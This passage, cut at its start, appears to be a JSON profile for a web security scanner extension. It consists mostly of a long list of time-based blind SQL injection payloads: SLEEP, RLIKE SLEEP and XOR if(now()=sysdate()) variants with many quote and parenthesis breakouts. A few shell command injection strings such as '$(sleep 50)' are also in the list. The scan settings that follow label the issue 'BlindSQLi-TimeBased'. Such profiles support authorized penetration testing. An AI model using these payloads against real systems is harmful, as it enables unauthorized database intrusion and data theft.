      "true,\u0027))) OR (SELECT 1337 FROM (SELECT(SLEEP(5)))YYYY) OR (((\u00271337\u0027 LIKE \u00271337",
      "true,%\u0027 OR (SELECT 1337 FROM (SELECT(SLEEP(5)))YYYY) OR \u00271337%\u0027\u003d\u00271337",
      "true,\u0027 OR (SELECT 1337 FROM (SELECT(SLEEP(5)))YYYY) OR \u00271337\u0027 LIKE \u00271337",
      "true,\") OR (SELECT 1337 FROM (SELECT(SLEEP(5)))YYYY) OR (\"1337\"\u003d\"1337",
      "true,\")) OR (SELECT 1337 FROM (SELECT(SLEEP(5)))YYYY) OR ((\"1337\"\u003d\"1337",
      "true,\"))) OR (SELECT 1337 FROM (SELECT(SLEEP(5)))YYYY) OR (((\"1337\"\u003d\"1337",
      "true,\" OR (SELECT 1337 FROM (SELECT(SLEEP(5)))YYYY) OR \"1337\"\u003d\"1337",
      "true,\") OR (SELECT 1337 FROM (SELECT(SLEEP(5)))YYYY) OR (\"1337\" LIKE \"1337",
      "true,\")) OR (SELECT 1337 FROM (SELECT(SLEEP(5)))YYYY) OR ((\"1337\" LIKE \"1337",
      "true,\"))) OR (SELECT 1337 FROM (SELECT(SLEEP(5)))YYYY) OR (((\"1337\" LIKE \"1337",
      "true,\" OR (SELECT 1337 FROM (SELECT(SLEEP(5)))YYYY) OR \"1337\" LIKE \"1337",
      "true,\u0027 OR (SELECT 1337 FROM (SELECT(SLEEP(5)))YYYY) OR \u00271337\u0027\u003d\u00271337",
      "true,\u0027) WHERE 1337\u003d1337 OR (SELECT 1337 FROM (SELECT(SLEEP(5)))YYYY)-- 1337",
      "true,\") WHERE 1337\u003d1337 OR (SELECT 1337 FROM (SELECT(SLEEP(5)))YYYY)-- 1337",
      "true,or sleep 5--",
      "true,or sleep 5",
      "true,or sleep(5)--",
      "true,or sleep(5)",
      "true,or SELECT SLEEP(5); #",
      "true,or SLEEP(5)",
      "true,or SLEEP(5)#",
      "true,or SLEEP(5)--",
      "true,or SLEEP(5)\u003d\"",
      "true,or SLEEP(5)\u003d\u0027",
      "true,\u0027 OR SLEEP(5)#",
      "true,\" OR SLEEP(5)#",
      "true,\u0027) OR SLEEP(5)#",
      "true,\u0027)) or sleep(5)\u003d\u0027",
      "true,\" or sleep(5)#",
      "true,1) or sleep(5)#",
      "true,)) or sleep(5)\u003d\u0027",
      "true,1)) or sleep(5)#",
      "true,or sleep(5)#",
      "true,%20\u0027sleep%2050\u0027",
      "true,%20$(sleep%2050)",
      "true,\")) or sleep(5)\u003d\"",
      "true,or sleep(5)\u003d\u0027",
      "true,\") or sleep(5)\u003d\"",
      "true,) or sleep(5)\u003d\u0027",
      "true,1 or sleep(5)#",
      "true,RLIKE SLEEP(5)--",
      "true,\u0027 RLIKE SLEEP(5)--",
      "true,\u0027 RLIKE SLEEP(5)-- 1337",
      "true,\" RLIKE SLEEP(5)-- 1337",
      "true,\u0027) RLIKE SLEEP(5)-- 1337",
      "true,\u0027) RLIKE SLEEP(5) AND (\u00271337\u0027\u003d\u00271337",
      "true,\u0027)) RLIKE SLEEP(5) AND ((\u00271337\u0027\u003d\u00271337",
      "true,\u0027))) RLIKE SLEEP(5) AND (((\u00271337\u0027\u003d\u00271337",
      "true,) RLIKE SLEEP(5)-- 1337",
      "true,) RLIKE SLEEP(5) AND (1337\u003d1337",
      "true,)) RLIKE SLEEP(5) AND ((1337\u003d1337",
      "true,))) RLIKE SLEEP(5) AND (((1337\u003d1337",
      "true,1 RLIKE SLEEP(5)",
      "true,1 RLIKE SLEEP(5)-- 1337",
      "true,1 RLIKE SLEEP(5)# 1337",
      "true,) WHERE 1337\u003d1337 RLIKE SLEEP(5)-- 1337",
      "true,1 WHERE 1337\u003d1337 RLIKE SLEEP(5)-- 1337",
      "true,+(SELECT 1337 WHERE 1337\u003d1337 RLIKE SLEEP(5))+",
      "true,)) AS 1337 WHERE 1337\u003d1337 RLIKE SLEEP(5)-- 1337",
      "true,) AS 1337 WHERE 1337\u003d1337 RLIKE SLEEP(5)-- 1337",
      "true,` WHERE 1337\u003d1337 RLIKE SLEEP(5)-- 1337",
      "true,`) WHERE 1337\u003d1337 RLIKE SLEEP(5)-- 1337",
      "true,\u0027 RLIKE SLEEP(5) AND \u00271337\u0027\u003d\u00271337",
      "true,\u0027) RLIKE SLEEP(5) AND (\u00271337\u0027 LIKE \u00271337",
      "true,\u0027)) RLIKE SLEEP(5) AND ((\u00271337\u0027 LIKE \u00271337",
      "true,\u0027))) RLIKE SLEEP(5) AND (((\u00271337\u0027 LIKE \u00271337",
      "true,%\u0027 RLIKE SLEEP(5) AND \u00271337%\u0027\u003d\u00271337",
      "true,\u0027 RLIKE SLEEP(5) AND \u00271337\u0027 LIKE \u00271337",
      "true,\") RLIKE SLEEP(5) AND (\"1337\"\u003d\"1337",
      "true,\")) RLIKE SLEEP(5) AND ((\"1337\"\u003d\"1337",
      "true,\"))) RLIKE SLEEP(5) AND (((\"1337\"\u003d\"1337",
      "true,\" RLIKE SLEEP(5) AND \"1337\"\u003d\"1337",
      "true,\") RLIKE SLEEP(5) AND (\"1337\" LIKE \"1337",
      "true,\")) RLIKE SLEEP(5) AND ((\"1337\" LIKE \"1337",
      "true,\"))) RLIKE SLEEP(5) AND (((\"1337\" LIKE \"1337",
      "true,\" RLIKE SLEEP(5) AND \"1337\" LIKE \"1337",
      "true,\u0027 RLIKE SLEEP(5) OR \u00271337\u0027\u003d\u00271337",
      "true,\u0027) WHERE 1337\u003d1337 RLIKE SLEEP(5)-- 1337",
      "true,\") WHERE 1337\u003d1337 RLIKE SLEEP(5)-- 1337",
      "true,\u0027 WHERE 1337\u003d1337 RLIKE SLEEP(5)-- 1337",
      "true,\" WHERE 1337\u003d1337 RLIKE SLEEP(5)-- 1337",
      "true,RLIKE SLEEP(5)--",
      "true,\u0027 RLIKE SLEEP(5)--",
      "true,\u0027 RLIKE SLEEP(5)-- 1337",
      "true,\" RLIKE SLEEP(5)-- 1337",
      "true,\u0027) RLIKE SLEEP(5)-- 1337",
      "true,\u0027) RLIKE SLEEP(5) OR (\u00271337\u0027\u003d\u00271337",
      "true,\u0027)) RLIKE SLEEP(5) OR ((\u00271337\u0027\u003d\u00271337",
      "true,\u0027))) RLIKE SLEEP(5) OR (((\u00271337\u0027\u003d\u00271337",
      "true,) RLIKE SLEEP(5)-- 1337",
      "true,) RLIKE SLEEP(5) OR (1337\u003d1337",
      "true,)) RLIKE SLEEP(5) OR ((1337\u003d1337",
      "true,))) RLIKE SLEEP(5) OR (((1337\u003d1337",
      "true,1 RLIKE SLEEP(5)",
      "true,1 RLIKE SLEEP(5)-- 1337",
      "true,1 RLIKE SLEEP(5)# 1337",
      "true,) WHERE 1337\u003d1337 RLIKE SLEEP(5)-- 1337",
      "true,1 WHERE 1337\u003d1337 RLIKE SLEEP(5)-- 1337",
      "true,+(SELECT 1337 WHERE 1337\u003d1337 RLIKE SLEEP(5))+",
      "true,)) AS 1337 WHERE 1337\u003d1337 RLIKE SLEEP(5)-- 1337",
      "true,) AS 1337 WHERE 1337\u003d1337 RLIKE SLEEP(5)-- 1337",
      "true,` WHERE 1337\u003d1337 RLIKE SLEEP(5)-- 1337",
      "true,`) WHERE 1337\u003d1337 RLIKE SLEEP(5)-- 1337",
      "true,\u0027 RLIKE SLEEP(5) OR \u00271337\u0027\u003d\u00271337",
      "true,\u0027) RLIKE SLEEP(5) OR (\u00271337\u0027 LIKE \u00271337",
      "true,\u0027)) RLIKE SLEEP(5) OR ((\u00271337\u0027 LIKE \u00271337",
      "true,\u0027))) RLIKE SLEEP(5) OR (((\u00271337\u0027 LIKE \u00271337",
      "true,%\u0027 RLIKE SLEEP(5) OR \u00271337%\u0027\u003d\u00271337",
      "true,\u0027 RLIKE SLEEP(5) OR \u00271337\u0027 LIKE \u00271337",
      "true,\") RLIKE SLEEP(5) OR (\"1337\"\u003d\"1337",
      "true,\")) RLIKE SLEEP(5) OR ((\"1337\"\u003d\"1337",
      "true,\"))) RLIKE SLEEP(5) OR (((\"1337\"\u003d\"1337",
      "true,\" RLIKE SLEEP(5) OR \"1337\"\u003d\"1337",
      "true,\") RLIKE SLEEP(5) OR (\"1337\" LIKE \"1337",
      "true,\")) RLIKE SLEEP(5) OR ((\"1337\" LIKE \"1337",
      "true,\"))) RLIKE SLEEP(5) OR (((\"1337\" LIKE \"1337",
      "true,\" RLIKE SLEEP(5) OR \"1337\" LIKE \"1337",
      "true,\u0027 RLIKE SLEEP(5) OR \u00271337\u0027\u003d\u00271337",
      "true,\u0027) WHERE 1337\u003d1337 RLIKE SLEEP(5)-- 1337",
      "true,\") WHERE 1337\u003d1337 RLIKE SLEEP(5)-- 1337",
      "true,\u0027 WHERE 1337\u003d1337 RLIKE SLEEP(5)-- 1337",
      "true,\" WHERE 1337\u003d1337 RLIKE SLEEP(5)-- 1337",
      "true,0\u0027XOR(if(now()\u003dsysdate(),sleep(5),0))XOR\u0027Z",
      "true,0\u0027XOR(if(now()\u003dsysdate(),sleep(5*1),0))XOR\u0027Z",
      "true,if(now()\u003dsysdate(),sleep(5),0)",
      "true,\u0027XOR(if(now()\u003dsysdate(),sleep(5),0))XOR\u0027",
      "true,\u0027XOR(if(now()\u003dsysdate(),sleep(5*1),0))OR\u0027",
      "true,0\u0027|(IF((now())LIKE(sysdate()),SLEEP(1),0))|\u0027Z",
      "true,0\u0027or(now()\u003dsysdate()\u0026\u0026SLEEP(1))or\u0027Z",
      "true,if(now()\u003dsysdate(),sleep(5),0)/\"XOR(if(now()\u003dsysdate(),sleep(5),0))OR\"/",
      "true,if(now()\u003dsysdate(),sleep(5),0)/*\u0027XOR(if(now()\u003dsysdate(),sleep(5),0))OR\u0027\"XOR(if(now()\u003dsysdate(),sleep(5),0))OR\"*/",
      "true,if(now()\u003dsysdate(),sleep(5),0)/\u0027XOR(if(now()\u003dsysdate(),sleep(5),0))OR\u0027\"XOR(if(now()\u003dsysdate(),sleep(5),0) and 5\u003d5)\"/",
      "true,if(1\u003d1,sleep(5),0)/*\u0027XOR(if(1\u003d1,sleep(5),0))OR\u0027\"XOR(if(1\u003d1,sleep(5),0))OR\"*/",
      "true,if(1337\u003d1337,exp(~(1)),0)/*\u0027XOR(if(1337\u003d1337,exp(~(1)),0))OR\u0027\"XOR(if(1337\u003d1337,sleep(5),0))OR\"*/",
      "true,SLEEP(5)/*\u0027 or SLEEP(5) or \u0027\" or SLEEP(5) or \"*/",
      "true,%2c(select%5*%5from%5(select(sleep(5)))a)",
      "true,(select(0)from(select(sleep(5)))v)",
      "true,(SELECT SLEEP(5))",
      "true,\u0027%2b(select*from(select(sleep(5)))a)%2b\u0027",
      "true,(select*from(select(sleep(5)))a)",
      "true,1\u0027%2b(select*from(select(sleep(5)))a)%2b\u0027",
      "true,,(select * from (select(sleep(5)))a)",
      "true,desc%2c(select*from(select(sleep(5)))a)",
      "true,-1+or+1%3d((SELECT+1+FROM+(SELECT+SLEEP(5))A))",
      "true,-1+or+1\u003d((SELECT+1+FROM+(SELECT+SLEEP(5))A))",
      "true,(SELECT * FROM (SELECT(SLEEP(5)))YYYY)",
      "true,(SELECT * FROM (SELECT(SLEEP(5)))YYYY)#",
      "true,(SELECT * FROM (SELECT(SLEEP(5)))YYYY)--",
      "true,\u0027+(select*from(select(sleep(5)))a)+\u0027",
      "true,(select(0)from(select(sleep(5)))v)%2f\u0027+(select(0)from(select(sleep(5)))v)+\u0027\"",
      "true,(select(0)from(select(sleep(5)))v)%2f*\u0027+(select(0)from(select(sleep(5)))v)+\u0027\"+(select(0)from(select(sleep(5)))v)+\"*%2f",
      "true,(select(0)from(select(sleep(5)))v)/*\u0027+(select(0)from(select(sleep(5)))v)+\u0027\"+(select(0)from(select(sleep(5)))v)+\"*/",
      "true,(select(0)from(select(sleep(5)))v)/*\u0027+(select(0)from(select(sleep(5)))v)+\u0027\\\"+(select(0)from(select(sleep(5)))v)+\\\"*/",
      "true,\u0027,\u0027\u0027),/*test*/%26%26%09sLeEp(5)%09--+"
    ],
    "Encoder": [
      "URL-encode key characters"
    ],
    "UrlEncode": false,
    "CharsToUrlEncode": "",
    "Grep": [],
    "Tags": [
      "SQLi",
      "All"
    ],
    "PayloadResponse": false,
    "NotResponse": false,
    "TimeOut1": "10",
    "TimeOut2": "20",
    "isTime": false,
    "contentLength": "",
    "iscontentLength": false,
    "CaseSensitive": false,
    "ExcludeHTTP": false,
    "OnlyHTTP": false,
    "IsContentType": false,
    "ContentType": "",
    "HttpResponseCode": "",
    "NegativeCT": false,
    "IsResponseCode": false,
    "ResponseCode": "",
    "NegativeRC": false,
    "urlextension": "",
    "isurlextension": false,
    "NegativeUrlExtension": false,
    "MatchType": 5,
    "Scope": 0,
    "RedirType": 0,
    "MaxRedir": 0,
    "payloadPosition": 2,
    "payloadsFile": "",
    "grepsFile": "",
    "IssueName": "BlindSQLi-TimeBased",
    "IssueSeverity": "High",
    "IssueConfidence": "Certain",
    "IssueDetail": "",
    "RemediationDetail": "",
    "IssueBackground": "",
    "RemediationBackground": "",
    "Header": [],
    "VariationAttributes": [],
    "InsertionPointType": [
      18,
      65,
      32,
      36,
      7,
      1,
      2,
      6,
      33,
      5,
      35,
      34,
      64,
      0,
      3,
      4,
      37,
      127,
      65,
      32,
      36,
      7,
      1,
      2,
      6,
      33,
      5,
      35,
      34,
      64,
      0,
      3,
      4,
      37,
      127
    ],
    "Scanas": false,
    "Scantype": 0,
    "pathDiscovery": false
  }
]